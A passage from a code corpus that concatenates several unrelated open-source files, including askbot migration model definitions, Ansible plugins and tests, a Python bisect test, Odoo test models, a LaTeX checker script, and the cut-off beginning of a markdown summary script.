'favorited_by': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'favorite_questions'", 'symmetrical': 'False', 'through': "orm['askbot.FavoriteQuestion']", 'to': "orm['auth.User']"}),
'favourite_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'followed_by': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'followed_questions'", 'symmetrical': 'False', 'to': "orm['auth.User']"}),
'html': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_activity_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_activity_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'last_active_in_questions'", 'to': "orm['auth.User']"}),
'last_edited_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_edited_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'last_edited_questions'", 'null': 'True', 'to': "orm['auth.User']"}),
'locked': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'locked_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'locked_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'locked_questions'", 'null': 'True', 'to': "orm['auth.User']"}),
'offensive_flag_count': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'summary': ('django.db.models.fields.CharField', [], {'max_length': '180'}),
'tagnames': ('django.db.models.fields.CharField', [], {'max_length': '125'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'questions'", 'symmetrical': 'False', 'to': "orm['askbot.Tag']"}),
'text': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'vote_down_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'vote_up_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'wikified_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'askbot.questionrevision': {
'Meta': {'ordering': "('-revision',)", 'object_name': 'QuestionRevision', 'db_table': "u'question_revision'"},
'author': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'questionrevisions'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'revisions'", 'to': "orm['askbot.Question']"}),
'revised_at': ('django.db.models.fields.DateTimeField', [], {}),
'revision': ('django.db.models.fields.PositiveIntegerField', [], {}),
'summary': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
'tagnames': ('django.db.models.fields.CharField', [], {'max_length': '125'}),
'text': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'askbot.questionview': {
'Meta': {'object_name': 'QuestionView'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'viewed'", 'to': "orm['askbot.Question']"}),
'when': ('django.db.models.fields.DateTimeField', [], {}),
'who': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'question_views'", 'to': "orm['auth.User']"})
},
'askbot.repute': {
'Meta': {'object_name': 'Repute', 'db_table': "u'repute'"},
'comment': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'negative': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'positive': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['askbot.Question']", 'null': 'True', 'blank': 'True'}),
'reputation': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'reputation_type': ('django.db.models.fields.SmallIntegerField', [], {}),
'reputed_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'askbot.tag': {
'Meta': {'ordering': "('-used_count', 'name')", 'object_name': 'Tag', 'db_table': "u'tag'"},
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_tags'", 'to': "orm['auth.User']"}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'deleted_tags'", 'null': 'True', 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'used_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'askbot.vote': {
'Meta': {'unique_together': "(('content_type', 'object_id', 'user'),)", 'object_name': 'Vote', 'db_table': "u'vote'"},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'votes'", 'to': "orm['auth.User']"}),
'vote': ('django.db.models.fields.SmallIntegerField', [], {}),
'voted_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'about': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'avatar_type': ('django.db.models.fields.CharField', [], {'default': "'n'", 'max_length': '1'}),
'bronze': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'consecutive_days_visit_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'blank': 'True'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'display_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'email_isvalid': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'email_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'email_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'gold': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'gravatar': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'has_custom_avatar': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignored_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'interesting_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'new_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'questions_per_page': ('django.db.models.fields.SmallIntegerField', [], {'default': '10'}),
'real_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'reputation': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'seen_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'show_country': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'silver': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'w'", 'max_length': '2'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['askbot']
| gpl-3.0 |
gentledevil/ansible | lib/ansible/plugins/action/include_vars.py | 82 | 1853 | # (c) 2013-2014, Benno Joy <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from ansible.errors import AnsibleError
from ansible.parsing import DataLoader
from ansible.plugins.action import ActionBase
class ActionModule(ActionBase):
TRANSFERS_FILES = False
def run(self, tmp=None, task_vars=dict()):
source = self._task.args.get('_raw_params')
if self._task._role:
source = self._loader.path_dwim_relative(self._task._role._role_path, 'vars', source)
else:
source = self._loader.path_dwim_relative(self._loader.get_basedir(), 'vars', source)
if os.path.exists(source):
(data, show_content) = self._loader._get_file_contents(source)
data = self._loader.load(data, show_content)
if data is None:
data = {}
if not isinstance(data, dict):
raise AnsibleError("%s must be stored as a dictionary/hash" % source)
return dict(ansible_facts=data, _ansible_no_log=not show_content)
else:
return dict(failed=True, msg="Source file not found.", file=source)
| gpl-3.0 |
dga4654dan/UTM-Demo | V_1_0_2_1/UtmDemo_Sfs_2.9.0/UtmDemo_Sfs_2.9.0_Server/lib/Lib/test/test_bisect.py | 15 | 5533 | from test_support import TestFailed
import bisect
import sys
nerrors = 0
def check_bisect(func, list, elt, expected):
global nerrors
got = func(list, elt)
if got != expected:
print >> sys.stderr, \
"expected %s(%s, %s) -> %s, but got %s" % (func.__name__,
list,
elt,
expected,
got)
nerrors += 1
# XXX optional slice arguments need tests.
check_bisect(bisect.bisect_right, [], 1, 0)
check_bisect(bisect.bisect_right, [1], 0, 0)
check_bisect(bisect.bisect_right, [1], 1, 1)
check_bisect(bisect.bisect_right, [1], 2, 1)
check_bisect(bisect.bisect_right, [1, 1], 0, 0)
check_bisect(bisect.bisect_right, [1, 1], 1, 2)
check_bisect(bisect.bisect_right, [1, 1], 2, 2)
check_bisect(bisect.bisect_right, [1, 1, 1], 0, 0)
check_bisect(bisect.bisect_right, [1, 1, 1], 1, 3)
check_bisect(bisect.bisect_right, [1, 1, 1], 2, 3)
check_bisect(bisect.bisect_right, [1, 1, 1, 1], 0, 0)
check_bisect(bisect.bisect_right, [1, 1, 1, 1], 1, 4)
check_bisect(bisect.bisect_right, [1, 1, 1, 1], 2, 4)
check_bisect(bisect.bisect_right, [1, 2], 0, 0)
check_bisect(bisect.bisect_right, [1, 2], 1, 1)
check_bisect(bisect.bisect_right, [1, 2], 1.5, 1)
check_bisect(bisect.bisect_right, [1, 2], 2, 2)
check_bisect(bisect.bisect_right, [1, 2], 3, 2)
check_bisect(bisect.bisect_right, [1, 1, 2, 2], 0, 0)
check_bisect(bisect.bisect_right, [1, 1, 2, 2], 1, 2)
check_bisect(bisect.bisect_right, [1, 1, 2, 2], 1.5, 2)
check_bisect(bisect.bisect_right, [1, 1, 2, 2], 2, 4)
check_bisect(bisect.bisect_right, [1, 1, 2, 2], 3, 4)
check_bisect(bisect.bisect_right, [1, 2, 3], 0, 0)
check_bisect(bisect.bisect_right, [1, 2, 3], 1, 1)
check_bisect(bisect.bisect_right, [1, 2, 3], 1.5, 1)
check_bisect(bisect.bisect_right, [1, 2, 3], 2, 2)
check_bisect(bisect.bisect_right, [1, 2, 3], 2.5, 2)
check_bisect(bisect.bisect_right, [1, 2, 3], 3, 3)
check_bisect(bisect.bisect_right, [1, 2, 3], 4, 3)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 0, 0)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 1, 1)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 1.5, 1)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 2, 3)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 2.5, 3)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 3, 6)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 3.5, 6)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 4, 10)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 5, 10)
check_bisect(bisect.bisect_left, [], 1, 0)
check_bisect(bisect.bisect_left, [1], 0, 0)
check_bisect(bisect.bisect_left, [1], 1, 0)
check_bisect(bisect.bisect_left, [1], 2, 1)
check_bisect(bisect.bisect_left, [1, 1], 0, 0)
check_bisect(bisect.bisect_left, [1, 1], 1, 0)
check_bisect(bisect.bisect_left, [1, 1], 2, 2)
check_bisect(bisect.bisect_left, [1, 1, 1], 0, 0)
check_bisect(bisect.bisect_left, [1, 1, 1], 1, 0)
check_bisect(bisect.bisect_left, [1, 1, 1], 2, 3)
check_bisect(bisect.bisect_left, [1, 1, 1, 1], 0, 0)
check_bisect(bisect.bisect_left, [1, 1, 1, 1], 1, 0)
check_bisect(bisect.bisect_left, [1, 1, 1, 1], 2, 4)
check_bisect(bisect.bisect_left, [1, 2], 0, 0)
check_bisect(bisect.bisect_left, [1, 2], 1, 0)
check_bisect(bisect.bisect_left, [1, 2], 1.5, 1)
check_bisect(bisect.bisect_left, [1, 2], 2, 1)
check_bisect(bisect.bisect_left, [1, 2], 3, 2)
check_bisect(bisect.bisect_left, [1, 1, 2, 2], 0, 0)
check_bisect(bisect.bisect_left, [1, 1, 2, 2], 1, 0)
check_bisect(bisect.bisect_left, [1, 1, 2, 2], 1.5, 2)
check_bisect(bisect.bisect_left, [1, 1, 2, 2], 2, 2)
check_bisect(bisect.bisect_left, [1, 1, 2, 2], 3, 4)
check_bisect(bisect.bisect_left, [1, 2, 3], 0, 0)
check_bisect(bisect.bisect_left, [1, 2, 3], 1, 0)
check_bisect(bisect.bisect_left, [1, 2, 3], 1.5, 1)
check_bisect(bisect.bisect_left, [1, 2, 3], 2, 1)
check_bisect(bisect.bisect_left, [1, 2, 3], 2.5, 2)
check_bisect(bisect.bisect_left, [1, 2, 3], 3, 2)
check_bisect(bisect.bisect_left, [1, 2, 3], 4, 3)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 0, 0)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 1, 0)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 1.5, 1)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 2, 1)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 2.5, 3)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 3, 3)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 3.5, 6)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 4, 6)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 5, 10)
def check_insort(n):
global nerrors
from random import choice
import sys
digits = "0123456789"
raw = []
insorted = []
for i in range(n):
digit = choice(digits)
raw.append(digit)
if digit in "02468":
f = bisect.insort_left
else:
f = bisect.insort_right
f(insorted, digit)
sorted = raw[:]
sorted.sort()
if sorted == insorted:
return
print >> sys.stderr, "insort test failed: raw %s got %s" % (raw, insorted)
nerrors += 1
check_insort(500)
if nerrors:
raise TestFailed("%d errors in test_bisect" % nerrors)
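# Illustrative note (not part of the original test): for a sorted list a,
# bisect_left returns the first index i with a[i] >= x, while bisect_right
# returns the first index i with a[i] > x, e.g.:
#     bisect.bisect_left([1, 1, 2], 1)   ->  0
#     bisect.bisect_right([1, 1, 2], 1)  ->  2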
| gpl-2.0 |
hogarthj/ansible | test/units/parsing/utils/test_yaml.py | 159 | 1176 | # -*- coding: utf-8 -*-
# (c) 2017, Ansible Project
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import pytest
from ansible.errors import AnsibleParserError
from ansible.parsing.utils.yaml import from_yaml
def test_from_yaml_simple():
assert from_yaml(u'---\n- test: 1\n test2: "2"\n- caf\xe9: "caf\xe9"') == [{u'test': 1, u'test2': u"2"}, {u"caf\xe9": u"caf\xe9"}]
def test_bad_yaml():
with pytest.raises(AnsibleParserError):
from_yaml(u'foo: bar: baz')
| gpl-3.0 |
bala4901/odoo | addons/website/models/test_models.py | 56 | 1285 | # -*- coding: utf-8 -*-
from openerp.osv import orm, fields
class test_converter(orm.Model):
_name = 'website.converter.test'
_columns = {
'char': fields.char(),
'integer': fields.integer(),
'float': fields.float(),
'numeric': fields.float(digits=(16, 2)),
'many2one': fields.many2one('website.converter.test.sub'),
'binary': fields.binary(),
'date': fields.date(),
'datetime': fields.datetime(),
'selection': fields.selection([
(1, "rΓ©ponse A"),
(2, "rΓ©ponse B"),
(3, "rΓ©ponse C"),
(4, "rΓ©ponse D"),
]),
'selection_str': fields.selection([
('A', "Qu'il n'est pas arrivΓ© Γ Toronto"),
('B', "Qu'il Γ©tait supposΓ© arriver Γ Toronto"),
('C', "Qu'est-ce qu'il fout ce maudit pancake, tabernacle ?"),
('D', "La rΓ©ponse D"),
], string=u"Lorsqu'un pancake prend l'avion Γ destination de Toronto et "
u"qu'il fait une escale technique Γ St Claude, on dit:"),
'html': fields.html(),
'text': fields.text(),
}
class test_converter_sub(orm.Model):
_name = 'website.converter.test.sub'
_columns = {
'name': fields.char(),
}
| agpl-3.0 |
2uller/LotF | App/Tools/Scripts/texcheck.py | 12 | 9489 | """ TeXcheck.py -- rough syntax checking on Python style LaTeX documents.
Written by Raymond D. Hettinger <python at rcn.com>
Copyright (c) 2003 Python Software Foundation. All rights reserved.
Designed to catch common markup errors including:
* Unbalanced or mismatched parenthesis, brackets, and braces.
* Unbalanced or mismatched \\begin and \\end blocks.
* Misspelled or invalid LaTeX commands.
* Use of forward slashes instead of backslashes for commands.
* Table line size mismatches.
Sample command line usage:
python texcheck.py -k chapterheading -m lib/librandomtex *.tex
Options:
-m Munge parenthesis and brackets. [0,n) would normally mismatch.
-k keyword: Keyword is a valid LaTeX command. Do not include the backslash.
-d: Delimiter check only (useful for non-LaTeX files).
-h: Help
-s lineno: Start at lineno (useful for skipping complex sections).
-v: Verbose. Trace the matching of //begin and //end blocks.
"""
import re
import sys
import getopt
from itertools import izip, count, islice
import glob
cmdstr = r"""
\section \module \declaremodule \modulesynopsis \moduleauthor
\sectionauthor \versionadded \code \class \method \begin
\optional \var \ref \end \subsection \lineiii \hline \label
\indexii \textrm \ldots \keyword \stindex \index \item \note
\withsubitem \ttindex \footnote \citetitle \samp \opindex
\noindent \exception \strong \dfn \ctype \obindex \character
\indexiii \function \bifuncindex \refmodule \refbimodindex
\subsubsection \nodename \member \chapter \emph \ASCII \UNIX
\regexp \program \production \token \productioncont \term
\grammartoken \lineii \seemodule \file \EOF \documentclass
\usepackage \title \input \maketitle \ifhtml \fi \url \Cpp
\tableofcontents \kbd \programopt \envvar \refstmodindex
\cfunction \constant \NULL \moreargs \cfuncline \cdata
\textasciicircum \n \ABC \setindexsubitem \versionchanged
\deprecated \seetext \newcommand \POSIX \pep \warning \rfc
\verbatiminput \methodline \textgreater \seetitle \lineiv
\funclineni \ulink \manpage \funcline \dataline \unspecified
\textbackslash \mimetype \mailheader \seepep \textunderscore
\longprogramopt \infinity \plusminus \shortversion \version
\refmodindex \seerfc \makeindex \makemodindex \renewcommand
\indexname \appendix \protect \indexiv \mbox \textasciitilde
\platform \seeurl \leftmargin \labelwidth \localmoduletable
\LaTeX \copyright \memberline \backslash \pi \centerline
\caption \vspace \textwidth \menuselection \textless
\makevar \csimplemacro \menuselection \bfcode \sub \release
\email \kwindex \refexmodindex \filenq \e \menuselection
\exindex \linev \newsgroup \verbatim \setshortversion
\author \authoraddress \paragraph \subparagraph \cmemberline
\textbar \C \seelink
"""
def matchclose(c_lineno, c_symbol, openers, pairmap):
"Verify that closing delimiter matches most recent opening delimiter"
try:
o_lineno, o_symbol = openers.pop()
except IndexError:
print "\nDelimiter mismatch. On line %d, encountered closing '%s' without corresponding open" % (c_lineno, c_symbol)
return
if o_symbol in pairmap.get(c_symbol, [c_symbol]): return
print "\nOpener '%s' on line %d was not closed before encountering '%s' on line %d" % (o_symbol, o_lineno, c_symbol, c_lineno)
return
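# For instance, with pairmap = {')': '('} and openers = [(3, '(')], calling
# matchclose(9, ')', openers, pairmap) pops the opener and returns silently,
# whereas an opener of '[' recorded on line 3 would print a mismatch report
# naming both line numbers. (Illustrative values only.)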
def checkit(source, opts, morecmds=[]):
"""Check the LaTeX formatting in a sequence of lines.
Opts is a mapping of options to option values if any:
-m munge parenthesis and brackets
-d delimiters only checking
-v verbose trace of delimiter matching
-s lineno: linenumber to start scan (default is 1).
Morecmds is a sequence of LaTeX commands (without backslashes) that
are to be considered valid in the scan.
"""
texcmd = re.compile(r'\\[A-Za-z]+')
falsetexcmd = re.compile(r'\/([A-Za-z]+)') # Mismarked with forward slash
validcmds = set(cmdstr.split())
for cmd in morecmds:
validcmds.add('\\' + cmd)
if '-m' in opts:
pairmap = {']':'[(', ')':'(['} # Munged openers
else:
pairmap = {']':'[', ')':'('} # Normal opener for a given closer
openpunct = set('([') # Set of valid openers
delimiters = re.compile(r'\\(begin|end){([_a-zA-Z]+)}|([()\[\]])')
braces = re.compile(r'({)|(})')
    doubledwords = re.compile(r'(\b[A-Za-z]+\b) \b\1\b')
spacingmarkup = re.compile(r'\\(ABC|ASCII|C|Cpp|EOF|infinity|NULL|plusminus|POSIX|UNIX)\s')
openers = [] # Stack of pending open delimiters
bracestack = [] # Stack of pending open braces
tablestart = re.compile(r'\\begin{(?:long)?table([iv]+)}')
tableline = re.compile(r'\\line([iv]+){')
tableend = re.compile(r'\\end{(?:long)?table([iv]+)}')
tablelevel = ''
tablestartline = 0
startline = int(opts.get('-s', '1'))
lineno = 0
for lineno, line in izip(count(startline), islice(source, startline-1, None)):
line = line.rstrip()
# Check balancing of open/close parenthesis, brackets, and begin/end blocks
for begend, name, punct in delimiters.findall(line):
if '-v' in opts:
print lineno, '|', begend, name, punct,
if begend == 'begin' and '-d' not in opts:
openers.append((lineno, name))
elif punct in openpunct:
openers.append((lineno, punct))
elif begend == 'end' and '-d' not in opts:
matchclose(lineno, name, openers, pairmap)
elif punct in pairmap:
matchclose(lineno, punct, openers, pairmap)
if '-v' in opts:
print ' --> ', openers
# Balance opening and closing braces
for open, close in braces.findall(line):
if open == '{':
bracestack.append(lineno)
if close == '}':
try:
bracestack.pop()
except IndexError:
print r'Warning, unmatched } on line %s.' % (lineno,)
# Optionally, skip LaTeX specific checks
if '-d' in opts:
continue
# Warn whenever forward slashes encountered with a LaTeX command
for cmd in falsetexcmd.findall(line):
if '822' in line or '.html' in line:
continue # Ignore false positives for urls and for /rfc822
if '\\' + cmd in validcmds:
print 'Warning, forward slash used on line %d with cmd: /%s' % (lineno, cmd)
# Check for markup requiring {} for correct spacing
for cmd in spacingmarkup.findall(line):
print r'Warning, \%s should be written as \%s{} on line %d' % (cmd, cmd, lineno)
# Validate commands
nc = line.find(r'\newcommand')
if nc != -1:
start = line.find('{', nc)
end = line.find('}', start)
validcmds.add(line[start+1:end])
for cmd in texcmd.findall(line):
if cmd not in validcmds:
print r'Warning, unknown tex cmd on line %d: \%s' % (lineno, cmd)
# Check table levels (make sure lineii only inside tableii)
m = tablestart.search(line)
if m:
tablelevel = m.group(1)
tablestartline = lineno
m = tableline.search(line)
if m and m.group(1) != tablelevel:
print r'Warning, \line%s on line %d does not match \table%s on line %d' % (m.group(1), lineno, tablelevel, tablestartline)
if tableend.search(line):
tablelevel = ''
# Style guide warnings
if 'e.g.' in line or 'i.e.' in line:
            print r'Style warning, avoid use of i.e. or e.g. on line %d' % (lineno,)
for dw in doubledwords.findall(line):
print r'Doubled word warning. "%s" on line %d' % (dw, lineno)
lastline = lineno
for lineno, symbol in openers:
print "Unmatched open delimiter '%s' on line %d" % (symbol, lineno)
for lineno in bracestack:
print "Unmatched { on line %d" % (lineno,)
print 'Done checking %d lines.' % (lastline,)
return 0
def main(args=None):
if args is None:
args = sys.argv[1:]
optitems, arglist = getopt.getopt(args, "k:mdhs:v")
opts = dict(optitems)
if '-h' in opts or args==[]:
print __doc__
return 0
if len(arglist) < 1:
print 'Please specify a file to be checked'
return 1
for i, filespec in enumerate(arglist):
if '*' in filespec or '?' in filespec:
arglist[i:i+1] = glob.glob(filespec)
morecmds = [v for k,v in optitems if k=='-k']
err = []
for filename in arglist:
print '=' * 30
print "Checking", filename
try:
f = open(filename)
except IOError:
            print 'Cannot open file %s.' % filename
return 2
try:
err.append(checkit(f, opts, morecmds))
finally:
f.close()
return max(err)
if __name__ == '__main__':
sys.exit(main())
| gpl-2.0 |
xor10/adsbypasser | deploy/mirrors/summary.py | 5 | 4293 | import re
import sys
from markdown.blockprocessors import BlockProcessor
from markdown.preprocessors import Preprocessor
from markdown.preprocessors import ReferencePreprocessor
from markdown.extensions import Extension
from markdown import markdown
from util import to_abs_path
_CHANGELOG_PATH = to_abs_path('../../CHANGELOG.md')
_SITES_PATH = to_abs_path('../../SITES.md')
_TEMPLATE_PATH = to_abs_path('./summary.template.md')
_MESSAGE = {
'both': '''**Lite edition** removes image-hosting site support from **Full edition**.
If you prefer to use other userscripts to deal with image-hosting sites, you can use the Lite edition.
''',
'full': 'If you do not need image-hosting site support, please see [Lite edition]({url}).',
'lite': 'Lite edition does not support image-hosting sites. If you want full-featured edition, please see [here]({url}).',
}
class _ChangeLogProcessor(BlockProcessor):
def __init__(self, parser, pack):
BlockProcessor.__init__(self, parser)
self._pack = pack
self._first = True
def test(self, parent, block):
return self._first
def run(self, parent, blocks):
h = blocks[0]
b = blocks[1]
self._pack.setChangeLog(h, b)
self._first = False
class _ChangeLogExtension(Extension):
def __init__(self, pack):
super(_ChangeLogExtension, self).__init__()
self._pack = pack
def extendMarkdown(self, md, md_globals):
clp = _ChangeLogProcessor(md.parser, self._pack)
md.parser.blockprocessors.add('changelog', clp, '>empty')
class _SitesProcessor(BlockProcessor):
def __init__(self, parser, pack):
BlockProcessor.__init__(self, parser)
self._pack = pack
self._first = True
def test(self, parent, block):
return self._first
    def run(self, parent, blocks):
        lines = blocks[0].splitlines()
        groups = []  # top-level '*' bullets, i.e. the site groups
        count = 0    # any other (indented) line is tallied as an individual site entry
        for line in lines:
